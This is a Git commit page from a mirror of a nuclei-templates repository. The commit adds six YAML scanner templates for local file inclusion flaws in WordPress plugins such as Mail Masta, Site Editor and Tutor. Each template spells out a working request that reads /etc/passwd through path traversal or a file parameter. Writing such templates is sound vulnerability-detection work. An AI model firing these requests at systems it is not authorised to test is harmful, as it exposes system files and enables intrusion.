daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1540 from projectdiscovery/wp-lfi 

Adding Wordpress Plugin LFI Templates
patch-1
Prince Chaddha 2021-05-28 17:03:27 +05:30 committed by GitHub
parent ebc08885e6 b54a107deb
commit aaae0a8214
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 114 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
vulnerabilities/wordpress/wp-localize-post-lfi.yaml Normal file
View File

@ -0,0 +1,19 @@
id: wp-localize-post-lfi
info:
name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

19
vulnerabilities/wordpress/wp-mail-masta-lfi.yaml Normal file
View File

@ -0,0 +1,19 @@
id: wp-mail-masta-lfi
info:
name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/40290
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

19
vulnerabilities/wordpress/wp-simple-fields-lfi.yaml Normal file
View File

@ -0,0 +1,19 @@
id: wp-simple-fields-lfi
info:
name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
author: 0x240x23elu
severity: high
reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

19
vulnerabilities/wordpress/wp-site-editor-lfi.yaml Normal file
View File

@ -0,0 +1,19 @@
id: wp-site-editor-lfi
info:
name: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/44340
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

19
vulnerabilities/wordpress/wp-tutor-lfi.yaml Normal file
View File

@ -0,0 +1,19 @@
id: wp-tutor-lfi
info:
name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/48058
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

19
vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml Normal file
View File

@ -0,0 +1,19 @@
id: wp-wechat-broadcast-lfi
info:
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/45438
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body